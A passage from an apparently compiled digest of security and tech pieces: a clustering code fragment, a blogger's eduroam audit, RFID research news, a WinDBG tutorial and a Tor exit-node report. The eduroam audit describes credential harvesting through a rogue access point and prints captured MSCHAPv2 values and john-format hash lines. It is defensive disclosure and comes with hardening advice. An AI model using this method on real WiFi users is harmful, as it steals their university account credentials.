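rng = np.random.default_rng(0)
answers = rng.integers(0, 4, size=(1000, 50))   # 1000 fake profiles, 50 fake questions

# Seven clusters, mirroring the seven groups described in the article.
km = KModes(n_clusters=7, init="Huang", n_init=5, verbose=0)
labels = km.fit_predict(answers)

print(np.bincount(labels))              # how many profiles landed in each cluster
print(km.cluster_centroids_[0][:10])    # the modal (most common) answers of the first cluster

Unlike k-means, K-Modes measures distance by counting mismatching categories and uses per-cluster modes instead of means, which is why it suits survey answers that have no numeric order.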
  10. eduroam WiFi security audit or why it is broken by design Over Christmas I got a TP-Link TL-WN722N USB WiFi device which is supported by hostapd, and finally I could test what I always wanted to test: eduroam. But first, what is eduroam? Eduroam is a WiFi network located at universities around the world with the goal of providing internet access to students and university staff at every university that supports eduroam ( https://en.wikipedia.org/wiki/Eduroam ). This means I can connect to the internet with eduroam at a university in France with my user credentials from my university in Germany. Sounds good, but how does it work? Well, the WiFi network uses WPA-Enterprise, which means you connect to an access point and the access point uses a radius server to authenticate you. Generally not a bad idea. But my tests have shown that the eduroam network is broken by design. In advance First things first. Some of my notes that I took from my tests can be seen here. I will provide them as a "POC||GTFO". But I stripped them so as not to provide a step-by-step tutorial in "how to pwn eduroam". The set-up I configured a VM with Debian Wheezy with an installation of hostapd. I had never configured a radiusd and wondered how I could get the user credentials if a client device authenticated to my rogue access point. Well, I found this cool project https://github.com/brad-anton/freeradius-wpe.git. This does everything for me and I do not have to patch the radiusd myself. But honestly, I do not trust this modified radiusd entirely, and after I configured everything I turned off the network interface of the VM that provides an internet connection, to prevent the radiusd from leaking something of my tests to the internet. Test without a certificate modification In my first test I just set everything up and started it. I started wpa_supplicant on my laptop and it did not connect to the rogue access point because the certificate is wrong. Ok, but what about my Android device? I activated the WiFi on my mobile phone and ... WTF, I am connected to the rogue access point. In the log file of the rogue access point I can read my user credentials in PLAINTEXT. Ok, that is not good. But what went wrong? The certificate used by the rogue access point is still invalid. The configuration on my Android device is completely flawed. I configured my Android device like the tutorial on my university's website said. The tutorial said that I do not have to configure any CA and should use PAP for phase 2 of the WPA-Enterprise authentication. Now you can say "Idiot, everyone can see that this is wrong!". But in my defense, I always thought that Android then uses its own installed CAs to check if the certificate of the access point is valid. Hell, even the network-manager on Ubuntu warns you if you give no CA in the settings. And I used PAP (I knew it sends the user credentials in cleartext) because I gathered from my university's tutorials that eduroam only supports PAP for the phase 2 authentication. But both assumptions were wrong. After I installed the "Deutsche_Telekom_Root_CA_2" CA on my Android device and used it in the WiFi configuration, it no longer connects to the rogue access point. Also, when the wpa_supplicant configuration is missing this line: ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem" it too ignores the invalid certificate of the access point and just connects to it. I wrote to the helpdesk of my university about the wrong tutorial for using eduroam on Android devices.
The helpdesk replied that they knew about this problem with the CA, but that Android is not able to verify the certificate of the access point. This is obviously wrong. And the funny thing about this is, they used screenshots in their tutorial to make it easier for everyone to configure eduroam on Android devices. And on these screenshots you can see the "CA certificate" option, which is just ignored. Their reply also told me some other interesting things about eduroam, which I checked in my next tests. As a summary of my first test: always configure the CA for eduroam (and in general for all WPA-Enterprise WiFi networks) and always use MSCHAPv2 instead of PAP. Even if your device connects to a rogue access point, the adversary only gets challenge-response values and has to brute-force them. If your password is strong enough, the adversary cannot use your credentials (at least he has to spend time brute-forcing MSCHAPv2 ...). Test with my own certificate In the email reply, my university's helpdesk wrote that if the user adds the CA to his WiFi settings, this would destroy the idea behind eduroam (being able to connect to every eduroam access point in the world). First I wondered about the "destroy the idea behind eduroam" part, but then I thought "They would not be so stupid, would they?". I had always assumed that everyone agreed to use the "Deutsche_Telekom_Root_CA_2" CA for eduroam. But this is not the case. A friend of mine was in Belgium and had to change the configured CA in his WiFi settings to connect to eduroam there. I searched through the eduroam tutorials of some universities in countries other than Germany, and they all used different CAs. Normally, the access point is configured to use a specific radius server which will send the certificate to the client (I do not know if it is even possible to use WPA-Enterprise in any other way). This means that by not agreeing on one CA for the entire eduroam infrastructure, the user has to NOT configure any CA in his WiFi settings in order to be able to use eduroam in the way it was intended. And with this, we have the first reason for eduroam being insecure by design. The email also stated that even if the user added the CA to his WiFi configuration, this would not help: an adversary could get a certificate signed by the CA and could therefore set up a rogue access point. This statement is true. But this holds for every public key infrastructure. For HTTPS, for example, a CA should not sign my certificate for "gmail.com" (unless I can prove that this is my domain/address). And at this point a question comes to mind. The client gets the certificate from the access point and then checks with the configured CA whether it is valid. But valid for what address? Normally, the CN (common name) in the certificate is checked against the address being used. But against what address is the certificate provided by the radius server checked?
A valid connection to the eduroam WiFi at my university with wpa_supplicant looks like this: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:25:45:b5:38:22 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP] wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=] The address given in the CN is "radius.ruhr-uni-bochum.de". But I never configured this anywhere. So in my next test I created my own CA and signed my own certificate with it. The certificate for the rogue access point and the CA got the following values: CA: C=DE ST=Some-State O=h4des.org CN=sqall certificate for rogue access point: C=DE ST=Some-State O=h4des.org CN=some-rogue-access-point emailAddress=sqall You can see that the CN field has "some-rogue-access-point" as its value, which is not the address of any radius server at all. First I tried wpa_supplicant with my newly created CA certificate in the configuration file: ca_cert="./CA.cert.pem" And what happened? wpa_supplicant connects to the rogue access point without any problems and discloses my user credentials as MSCHAPv2 challenge-response values. The output of wpa_supplicant shows that the radius server uses my newly created certificate. wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-State/O=h4des.org/CN=some-rogue-access-point/emailAddress=sqall' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request Next I tested it on my Android 4.0.4 device. I installed my own CA on the device and changed the eduroam WiFi settings to check for this CA. The device connects to the rogue access point without any problems and also discloses my user credentials. As a summary of this test: the certificate for the rogue access point just has to be a valid certificate signed by the CA in use. It does not matter for which address the certificate was issued; it just has to be valid. Normally, the obstacle to forging a valid host in a TLS/SSL connection (such as the HTTPS example for "gmail.com" I gave earlier) is that a CA does not sign your certificate request unless you own the domain/address (or rather, the CA should not). But if you can use any address in the CN, it is no problem to get a signed certificate.
Here lies the second reason for eduroam being insecure by design. I do not know if the vendor offers a service to sign your own certificates with the "Deutsche_Telekom_Root_CA_2" certificate. But normally they do. And if the vendor does, there is absolutely no problem configuring a rogue access point which cannot be distinguished from a valid one. It should be mentioned that the address of the radius server can be configured in the iDevice profiles. But I have no iDevice, so I cannot check if the CN of the certificate provided by the radius server is checked against the configured address. In wpa_supplicant, for example, I did not find any configuration option for the address of the radius server. But I found the option to match certain criteria of the accepted server certificate with "subject_match". Android 4.0.4 does not provide any such options. Test with my own intermediate CA After an arbitrary signed certificate was tested, the next interesting thing is a certificate signed by an intermediate CA. When we look at the wpa_supplicant output when connecting to a benign access point: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:25:45:b5:38:22 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP] wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=] we can see that the certificate is signed by the CA of my university (and not by the "Deutsche_Telekom_Root_CA_2" CA). Actually, the chain is "Deutsche_Telekom_Root_CA_2" -> "DFN-Verein PCA Global - G01" -> "Ruhr-Universitaet Bochum CA". So my idea at this point was: it could be difficult (and perhaps costly) to get a certificate signed by the "Deutsche_Telekom_Root_CA_2" CA, but a certificate signed by the university is very easy to get as a student or university staff member. So I created my own intermediate CA signed by my formerly created CA and generated a new certificate for my rogue eduroam access point. The values for all these CAs and the certificate are: CA: C=DE ST=Some-State O=h4des.org CN=sqall intermediate CA: C=DE ST=Some-Other-State O=h4des.org OU=intermediate CN=it is sqall again certificate for rogue access point: C=DE ST=Some-Other-State O=h4des.org OU=intermediate certificate CN=again sqall Again, wpa_supplicant is tried first. The settings are the same as for the previous test (this means wpa_supplicant uses the certificate of my CA to check the validity of the rogue access point).
The output of wpa_supplicant shows that the rogue access point offers my new certificate signed by the intermediate CA, and that the client connects without any problems: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate/CN=it is sqall again' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate certificate/CN=again sqall' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request The log file of my modified radius server shows me the MSCHAPv2 challenge-response values: mschap: Sat Jan 11 19:42:27 2014 username: pawlxyz@ruhr-uni-bochum.de challenge: 43:cd:42:0f:a6:14:46:4e response: 0d:b8:47:c0:11:a6:c9:10:a2:14:99:af:1d:15:d6:ef:4a:89:d3:95:aa:ba:2d:2b john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$42cd490fa604464c$0db486c012a6c910a21379ef1d15d6ff4a89d395baba2d2c Next I tested my Android 4.0.4 device. Like the wpa_supplicant client, it connects without any problems (because the access point is now considered valid). As a summary of this test: the client accepts certificates that are signed by intermediate CAs. In this constellation, it is the third reason for eduroam being insecure by design. It might be difficult to get a certificate signed by the main CA. But when intermediate CAs are in place, it could be a lot easier to get a valid certificate. The "Deutsche_Telekom_Root_CA_2" CA signed the "DFN-Verein PCA Global - G01" intermediate CA, and this signed the CA of my university. I think that the "DFN-Verein PCA Global - G01" intermediate CA signed a lot of university CAs. And a lot of universities (like mine) offer the service of signing your server certificate (when it is inside the namespace of the university). When you are able to get a certificate that is signed by any of the CAs in the chain, you can forge a valid eduroam access point. Test with a server certificate signed by my university Ok, enough talk about "uhh, it is insecure with this public key infrastructure!" and "it is theoretically possible to ...", let's break it! I helped the university to set up some servers, so I have access to a certificate signed by the university CA, and I configured my rogue access point to use this certificate. This certificate obviously does not have "radius.ruhr-uni-bochum.de" as its CN value. It is valid for other addresses, which I censored out. We saw in the tests above that the value in the CN field does not matter. First I tried wpa_supplicant, now with the settings that should be used for a valid eduroam access point.
This is the output: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/OU=xxx/CN=xxx' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request And we can see that the client thinks it is a valid eduroam access point. The log file of the modified radius server shows my MSCHAPv2 credentials: mschap: Sun Jan 12 01:24:03 2014 username: pawlxyz@ruhr-uni-bochum.de challenge: 28:f5:bf:4d:3f:fe:bf:a2 response: 7a:ab:24:87:35:82:46:40:33:73:89:5a:77:bb:ee:c0:4b:56:8b:a8:67:af:e9:94 john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$28f5bb4d8ffaafa2$7aab248735824641d373895a77dbeec04b568ba867afe994 The same goes for my Android 4.0.4 mobile phone. A client is not able to distinguish a benign eduroam access point from my rogue access point. A fun fact that happened when I had just started my rogue access point with the valid certificate: the mobile device of one of my neighbors connected to it instantly (his or her login credentials are from a different university than mine). One has to love all the folks that have their WiFi always turned on. Test with a client certificate signed by my university My university offers the service of providing any student with a client certificate signed by the university's CA. My idea was "most clients do not provide options for the radius server address, perhaps they do not check if the certificate is only for clients". Beforehand, I can tell you that wpa_supplicant and Android 4.0.4 do check this (I did not test others). I used a certificate with these key usages, signed by my university's CA: X509v3 Key Usage: Digital Signature, Non Repudiation, Key Encipherment X509v3 Extended Key Usage: TLS Web Client Authentication, E-mail Protection So, when I try to connect with wpa_supplicant I get this output: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected TLS: Certificate verification failed, error 26 (unsupported certificate purpose) depth 0 for '/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' wlan0: CTRL-EVENT-EAP-TLS-CERT-ERROR reason=0 depth=0 subject='/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' err='unsupported certificate purpose' SSL: SSL3 alert: write (local SSL3 detected an error):fatal:unsupported certificate OpenSSL: openssl_handshake - SSL_connect error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed So we can clearly see that wpa_supplicant checks the certificate purpose. The same goes for Android 4.0.4.
It just reports an authentication error. To summarize this part: this does not have anything to do with the design or security of the eduroam network; it is only an implementation detail of the client software used. I just tested it in the hope of finding a "fuck up" in some WiFi clients, but was disappointed. Conclusion In this part I conclude my short security audit of the eduroam WiFi network. In my opinion it has a huge design flaw which cannot be fixed without changing the whole public key infrastructure. To me it seems that when they were designing the whole eduroam network they just thought "We need some public key cryptography for eduroam. The protocol supports TLS/SSL for authentication. It is used by the internet. So let us just use it too!". Using different CAs in different countries, which in turn signed a lot of intermediate CAs, is not a good idea when the clients do not or cannot check the address of the radius server which provides the certificate. Every certificate that is signed by one of the intermediate CAs or by the top CA in use is valid for any client that tries to connect to the eduroam WiFi. Furthermore, the idea of eduroam was to provide a network to which a client from a different country could also connect (for example, a client from Germany could connect to an eduroam access point when he is in Belgium). This is not possible when different top CAs are used in each country (or perhaps even within a country). Or rather, this is only possible when certificates are not checked. But when they are not checked, what is the point of using TLS/SSL? The next thing is, a lot of universities (like mine) provide flawed tutorials for configuring WiFi clients for eduroam. Even where MSCHAPv2 is available, the tutorials often use PAP to authenticate the client. PAP sends all user credentials in plaintext, whereas MSCHAPv2 provides a challenge-response procedure. Furthermore, a lot of tutorials do not set up the CA to check the server certificate. Without this setting the client connects to any eduroam access point without checking the validity of the server certificate. This means that when a user configures her client with the help of the flawed tutorials and uses eduroam, she could just as well shout out her credentials every time she connects to the WiFi network. The really bad thing about this is that when an adversary gets the user credentials of someone, he often has the user credentials for other services of the university as well, because the same account is used (in the case of my university for the email account, the MSDNAA account, ...). I have heard of some universities that even use these credentials to let students register/unregister for exams of the offered courses. The only way a client can protect herself against this attack is by using MSCHAPv2. When MSCHAPv2 is used, the adversary still has to brute-force the password when he successfully forges an eduroam access point. This means the security comes from the strength of her password (and the strength of MSCHAPv2 ... which uses DES and can be cracked relatively fast with services like https://www.cloudcracker.com/ :/ ). In my opinion, the only way to really fix this issue is to use a dedicated public key infrastructure for the whole eduroam WiFi design. When a dedicated CA is used for eduroam (perhaps with intermediate CAs for universities to use only for certificates that are used by the eduroam infrastructure) there is no way for an attacker to forge a valid eduroam access point, because he cannot get a signed certificate for it.
If the clients then set up that CA in their eduroam settings, they would not connect to rogue access points. Even if the client is configured to use PAP instead of MSCHAPv2, the user credentials would be reasonably safe. But a dedicated public key infrastructure would only work if the clients are configured correctly, and this means that the universities have to fix their tutorials for the eduroam WiFi first. I wrote to my university about this issue and they fixed some tutorials (for example for Android). But not all are fixed (for example for wpa_supplicant) and I do not think that they will fix all of them. But even so, fixing the tutorials will not help where a lot of students and university staff have already applied the flawed configurations. Errata At the time of writing this article, I had not tested this statement. I just based it on the settings you can make in an access point, the statement of my university and the statement my friend had made. However, last night I drove to the next city to test this statement at another university (the TU Dortmund). Honestly, I did not expect this result: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:14:a8:14:86:f1 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' EAP-TTLS: Phase 2 MSCHAPV2 authentication succeeded The wpa_supplicant output shows that even when I am at another university in Germany and use eduroam there, the CA chain looks the same as at my university. This means that my WiFi client still connects to the radius server of my university. I did not expect that (and do not really have an idea how this infrastructure works exactly). Unfortunately, I have no way to test it with a university in a foreign country. Nevertheless, my conclusion that a dedicated CA should have been used for the eduroam infrastructure remains the same. Source: eduroam WiFi security audit or why it is broken by design - sqall's blog
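To tie the recommendations in this write-up together, here is a sketch of a hardened wpa_supplicant network block along the lines the author describes: pinning the CA, using MSCHAPv2 for phase 2 instead of PAP, and restricting the accepted server certificate subject with subject_match. This is an illustrative configuration in the same format the post already quotes, not one taken from any university tutorial; the identity, password and certificate path are placeholders.

network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=TTLS
    identity="user@ruhr-uni-bochum.de"
    password="REPLACE_ME"
    ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem"
    phase2="auth=MSCHAPV2"
    subject_match="radius.ruhr-uni-bochum.de"
}

As the tests above show, ca_cert alone is not enough once any certificate in the chain can be obtained by an attacker; the subject_match line is what actually ties the connection to the expected radius server.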
11. Near error-free wireless detection made possible

Date: January 23, 2014
Source: University of Cambridge

Summary: A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 percent accuracy over a much wider range than current systems.

A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 per cent accuracy over a much wider range than current systems. The accuracy and range of radio frequency identification (RFID) systems, which are used in everything from passports to luggage tracking, could be vastly improved thanks to a new system developed by researchers at the University of Cambridge. The vastly increased range and accuracy of the system opens up a wide range of potential monitoring applications, including support for the sick and elderly, real-time environmental monitoring in areas prone to natural disasters, or paying for goods without the need for conventional checkouts. The new system improves the accuracy of passive (battery-less) RFID tag detection from roughly 50 per cent to near 100 per cent, and increases the reliable detection range from two to three metres to approximately 20 metres. The results are outlined in the journal IEEE Transactions on Antennas and Propagation.

RFID is a widely used wireless sensing technology which uses radio waves to identify an object in the form of a serial number. The technology is used for applications such as baggage handling in airports, access badges, inventory control and document tracking. RFID systems are composed of a reader and a tag, and unlike conventional bar codes, the reader does not need to be in line of sight with the tag in order to detect it, meaning that tags can be embedded inside an object, and that many tags can be detected at once. Additionally, the tags require no internal energy source or maintenance, as they get their power from the radio waves interrogating them.

"Conventional passive UHF RFID systems typically offer a lower useful read range than this new solution, as well as lower detection reliability," said Dr Sithamparanathan Sabesan of the Centre for Photonic Systems in the Department of Engineering. "Tag detection accuracy usually degrades at a distance of about two to three metres, and interrogating signals can be cancelled due to reflections, leading to dead spots within the radio environment."

Several other methods of improving passive RFID coverage have been developed, but they do not address the issue of dead spots. However, by using a distributed antenna system (DAS) of the type commonly used to improve wireless communications within a building, Dr Sabesan and Dr Michael Crisp, along with Professors Richard Penty and Ian White, were able to achieve a massive increase in RFID range and accuracy. By multicasting the RFID signals over a number of transmitting antennas, the researchers were able to dynamically move the dead spots to achieve an effectively error-free system. Using four transmitting and receiving antenna pairs, the team were able to reduce the number of dead spots in the system from nearly 50 per cent to zero per cent over a 20 by 15 metre area. In addition, the new system requires fewer antennas than current technologies.
In most of the RFID systems currently in use, the best way to ensure an accurate reading of the tags is to shorten the distance between the antennas and the tags, meaning that many antennas are required to achieve an acceptable accuracy rate. Even so, it is impossible to achieve completely accurate detection. But by using a DAS RFID system to move the location of dead spots away from the tag, an accurate read becomes possible without the need for additional antennas. The team is currently working to add location functionality to the RFID DAS system which would allow users to see not only which zone a tagged item was located in, but also approximately where it was within that space. The system, recognised by the award of the 2011 UK RAEng/ERA Innovation Prize, is being commercialised by the Cambridge team. This will allow organisations to inexpensively and effectively monitor RFID tagged items over large areas. The research was funded by the Engineering and Physical Sciences Research Council (EPSRC) and Boeing. Sursa: Near error-free wireless detection made possible -- ScienceDaily
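To see why switching the signal between antennas can move dead spots, here is a toy one-dimensional interference model. It is purely illustrative and is not the Cambridge system; the frequency, antenna positions and phase states are arbitrary assumptions. A tag position that sits in a deep null for one relative phase between two transmit antennas is no longer in a null once the phase is switched, so reading with several phase states leaves no position permanently unreadable.

import numpy as np

C = 3e8
FREQ = 866e6                       # a typical European UHF RFID frequency (assumption)
K = 2 * np.pi * FREQ / C           # wavenumber
ANTENNAS = np.array([0.0, 10.0])   # two transmit antennas on a line, 10 m apart (assumption)
positions = np.linspace(0.5, 9.5, 500)                    # candidate tag positions between them
phases = np.array([0, np.pi / 2, np.pi, 3 * np.pi / 2])   # switched relative phase states

def field_strength(phase):
    # field at each tag position = sum of the two path contributions (free-space phase, 1/d decay)
    d = np.abs(positions[:, None] - ANTENNAS[None, :])
    contrib = np.exp(-1j * K * d) / d
    contrib[:, 1] *= np.exp(1j * phase)    # extra phase applied to the second antenna
    return np.abs(contrib.sum(axis=1))

single = field_strength(0.0)
switched = np.max([field_strength(p) for p in phases], axis=0)  # best of the switched states

print("worst-case field, single phase state :", single.min())
print("worst-case field, switched phases    :", switched.min())

In this toy model the worst-case field with a single phase state is close to zero (a dead spot), while the best-of-several-states value stays well above it, which is the intuition behind moving dead spots with a distributed antenna system.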
12. [h=3]Getting Started with WinDBG - Part 1[/h]

By Brad Antoniewicz.

WinDBG is an awesome debugger. It may not have a pretty interface or a black background by default, but it is still one of the most powerful and stable Windows debuggers out there. In this article I'll introduce you to the basics of WinDBG to get you off the ground running. This is part one of a multipart series, here's our outline of what's in store:

Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers
Part 2 - Breakpoints
Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks

In this blog post we'll cover installing and attaching to a process, then in the next blog post we'll go over breakpoints, stepping, and inspecting memory.

[h=1]Installation[/h]

Microsoft has changed things slightly in WinDBG's installation from Windows 7 to Windows 8. In this section we'll walk through the install on both.

[h=2]Windows 8[/h]

For Windows 8, Microsoft includes WinDBG in the Windows Driver Kit (WDK). You can install Visual Studio and the WDK, or just install the standalone "Debugging Tools for Windows 8.1" package that includes WinDBG. This is basically a thin installer that needs to download WinDBG after you walk through a few screens. The install will ask you whether you'd like to install locally or download the development kit for another computer. The latter is the equivalent of an offline installer, which is my preference so that you can install on other systems easily in the future. From there just Next your way to the features page, deselect everything but "Debugging Tools for Windows" and click "Download". Once the installer completes you can navigate to your download directory, which is c:\Users\Username\Downloads\Windows Kits\8.1\StandaloneSDK by default, and then next through that install. Then you're all ready to go!

[h=2]Windows 7 and Below[/h]

For Windows 7 and below, Microsoft offers WinDBG as part of the "Debugging Tools for Windows" package that is included within the Windows SDK and .NET Framework. This requires you to download the online/offline installer, then specifically choose the "Debugging Tools for Windows" install option. My preference is to check the "Debugging Tools" option under "Redistributable Packages" and create a standalone installer, which makes future debugging efforts a heck of a lot easier. That's what I'll do here. Once the installation completes, you should have the redistributables for various platforms (x86/x64) in the c:\Program Files\Microsoft SDKs\Windows\v7.1\Redist\Debugging Tools for Windows\ directory. From there the installation is pretty simple: just copy the appropriate redistributable to the system you're debugging and then click through the installation.

Articol complet: http://blog.opensecurityresearch.com/2013/12/getting-started-with-windbg-part-1.html
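Once WinDBG is installed and attached to a process (for example with windbg -pn notepad.exe, or via File > Attach to a Process in the GUI), a first session typically touches exactly the topics Part 1 covers: symbols, modules and registers. The commands below are a generic illustrative sketch rather than an excerpt from the article, and the local symbol cache directory is an arbitrary choice:

.symfix c:\symbols    $$ point the symbol path at the public Microsoft symbol server, caching locally
.reload               $$ (re)load symbols for the modules that are already mapped
lm                    $$ list the loaded modules
r                     $$ dump the registers of the current thread
k                     $$ display the call stack
g                     $$ resume execution of the target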
13. Who is spying on Tor network exit nodes from Russia?

by paganinip on January 23rd, 2014

Researchers Winter and Lindskog identified 25 nodes of the Tor network that tampered with web traffic, decrypted the traffic, or censored websites.

Two researchers, Philipp Winter and Stefan Lindskog of Karlstad University in Sweden, presented the results of a four-month study conducted to test Tor network exit nodes for sneaky behavior. They discovered that an unspecified Russian entity is eavesdropping on nodes at the edge of the Tor network. The researchers used a custom tool for their analysis and found that the entity appeared to be particularly interested in users' Facebook traffic. Winter and Lindskog identified 25 nodes that tampered with web traffic, decrypted the traffic, or censored websites. Of the compromised nodes, 19 were used for man-in-the-middle attacks on users, decrypting and re-encrypting traffic on the fly.

The Tor network anonymizes a user's web activity, under specific conditions, by bouncing encrypted traffic through a series of nodes before reaching the destination website through any of over 1,000 "exit nodes." The study is based on two fundamental considerations: first, user traffic is vulnerable at the exit nodes, since transit through an exit node exposes it to eavesdropping (a well-known example is WikiLeaks, which was initially seeded with documents intercepted by eavesdropping on Chinese hackers through a bugged exit node); second, Tor nodes are run by volunteers who can easily set up and take down their servers whenever they want.

